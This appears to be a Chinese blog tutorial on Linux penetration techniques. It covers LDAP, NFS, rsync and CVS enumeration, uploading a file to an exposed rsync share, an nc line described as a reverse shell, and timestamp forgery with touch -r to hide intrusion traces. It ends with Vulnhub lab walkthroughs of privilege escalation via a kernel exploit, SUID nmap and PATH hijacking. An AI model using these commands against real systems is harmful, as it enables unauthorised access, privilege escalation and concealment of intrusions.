Linux基础

Linux下自带渗透方面的命令

一.ldap渗透技巧

(LDAP是轻量目录访问协议,它是基于X.500标准的,但是简单多了并且可以根据需要定制。与X.500不同,LDAP支持TCP/IP,这对访问Internet是必须的。)
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置

3.查找管理员信息
匿名方式
ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net”-h 192.168.2.2
有密码形式
ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b“cn=administrator,cn=People,dc=unix-center,dc=net”-h 192.168.2.2

4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

5.返回所有的属性

ldapsearch-h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”

6.查看基类
ldapsearch -h192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” | more

7.查找
ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”

二.NFS渗透技巧

列举IP

showmount-e ip

三.rsync渗透技巧

1.查看rsync服务器上的列表
rsync 210.51.X.X::

2.看相应的下级目录(注意一定要在目录后面添加上/)

rsync210.51.X.X::htdocs_app/

3.下载rsync服务器上的配置文件
rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

4.向上更新rsync文件(成功上传,不会覆盖)
rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt

四.squid渗透技巧

nc-vv 91ri.org 80

(squid为代理服务器,命令意思是建立反弹shell)

五.freebsd本地提权

[argp@julius~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
* [argp@julius ~]$ sysctl vfs.usermount
* vfs.usermount: 1
* [argp@julius ~]$ id
* uid=1001(argp) gid=1001(argp) groups=1001(argp)
* [argp@julius ~]$ gcc -Wallnfs_mount_ex.c -o nfs_mount_ex
* [argp@julius ~]$ ./nfs_mount_ex

六.cvs渗透技巧

CVSROOT/passwdUNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries 更新的文件和目录内容
CVS/Repository

七.修改上传文件时间戳(掩盖入侵痕迹)

touch-r 老文件时间戳 新文件时间戳

Linux网卡配置和网络诊断命令

1、ifconfig:这个命令可以查看当前主机的ip地址和网卡信息

(ifconfig eth0:查看制定网卡信息

附加网卡的启用ifupeth0与停用stop eth0命令)

2、ping:ping命令可以用来测试网络的连通性,使用非常广泛,不论是一般用户还是黑客都喜欢钟爱这个命令

3、netstat:netstat (网络统计)命令显示连接信息,路由表信息等,通常配合使用参数

(netstat -?:查看参数的功能   netstat -r:查看路由信息)

4、traceroute:traceroute是路由跟踪命令,可以查看到你从源到目的的所经过的路由

(例如:traceroute www.baidu.com以跟踪访问百度)

5、dig与nslookup:dig查询DNS相关信息记录,CNAME,MX记录等等。这个命令主要用于解决相关DNS查询;nslookup也具备查询DNS的功能,还可以显示一个ip地址的记录!

(例如:dig www.baidu.com查询百度的DNS   nslookupwww.baidu.com

6、host和hostname:host命令可以用来查找到IP的名称或IP的名字在IPv4和IPv6 DNS记录,hostname命令查看主机名,或者你可以到/etc/sysconfig/network中修改主机名

7、route:可以用来查看路由表,也可以用来增加和删除路由条目

8、arp:ARP为地址解析协议,可以看到默认的表使用

9、ethtool:ethtool查看到网络模式和网络速度等信息。有关配置可以到/etc/sysconfig/network-scripts/ifcfg-eth0下进行修改

10、GUI管理命令system-config-network,图形化的管理界面调用命令

Linux中的特殊权限s、t、i、a

文件权限除了r、w、x外还有s、t、i、a权限:

s:文件属主和组设置SUID和GUID,文件在被设置了s权限后将以root身份执行。在设置s权限时文件属主、属组必须先设置相应的x权限,否则s权限并不能正真生效(chmod命令不进行必要的完整性检查,即使不设置x权限就设置s权限,chmod也不会报错,当我们ls -l时看到rwS,大写S说明s权限未生效)Linux修改密码的passwd便是个设置了SUID的程序,普通用户无读写/etc/shadow文件的权限却可以修改自己的密码

t:设置粘着位,一个文件可读写的用户并一定想让他有删除此文件的权限,如果文件设置了t权限则只有属主和root有删除文件的权限。通过chmod +t filename 来设置t权限。

i不可修改权限(例:chattr u+i filename 则filename文件就不可修改,无论任何人,如果需要修改需要先删除i权限,用chattr -i filename就可以了。查看文件是否设置了i权限用lsattr filename。)

a:只追加权限,对于日志系统很好用,这个权限让目标文件只能追加,不能删除,而且不能通过编辑器追加。可以使用chattr +a设置追加权限。

Linux提权(Vulnhub下载

实验1:利用Linux内核漏洞提权(VulnOSversion 2

1、首先移动到/tmp目录,然后新建一个文件,粘贴exploit代码进去

2、保存退出后,编译代码gcc exploit.c -o exploit

3、现在执行,如果提示没有权限,还需:chomd 777 ./exploit

4、当已经获取到了root权限,接下来获取交互式的shell:

python -c‘import pty; pty.spawn(“/bin/bash”)’

注意:内核exploit提权有风险,有可能会崩溃系统。

实验2:利用低权限用户目录下可被Root权限用户调用的脚本提权(Mr.Robot

Mr.Robot是一个boot到root的挑战虚拟机

1、切换到tmp目录下

2、寻找系统里可以用的SUID文件来提权

find /-perm -u=s -type f 2>/dev/null

3、通过截图,我们发现nmap居然有SUID标志位,来看看nmap版本:

/usr/local/bin/nmap--version

发现nmap版本为3.48/3.81

nmap支持“interactive”选项,用户能够通过该选项执行shell命令,通常,安全人员会使用该命令来避免他们使用nmap命令被记录在history文件中:/usr/local/bin/nmap --interactive

4、因为nmap有SUID位,所以通过“!sh”我们会获取到一个root权限的shell:

!sh

实验3:利用环境变量劫持高权限程序提权(PwnLad)

PwnLad中一个攻击者有几个账号,但是都不是root权限。

当前登录的是”Kane”账号,当前没有有效的内核exploit,也没有其他可以利用的suid文件 

1、Kane的home目录下只有一个“msgmike.”文件

2、使用file命令查看下这个文件:file msgmike

3、从截图可以看到,这是一个ELF 32位LSB执行文件,但是当我们执行文件的时候,报错了

4、通过报错信息我们可以看到msgmike调用cat命令读取/home/mike/msg.txt文件。针对这种情况,我们可以通过设置bash的$path环境变量来利用,通常的$PATH包含,然而当我们调用cat命令的时候,cat会从以上目录来寻找,如果我们添加.到$PATH环境变量,则会先从当前目录来寻找cat指令

exportPATH=”.”

5、新建cat,添加执行权限:

touch cat

echo“/bin/sh” > cat

6、这样当我们再次运行./msgmike命令的时候,就会触发当前目录下的cat(/bin/sh),从而提权

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值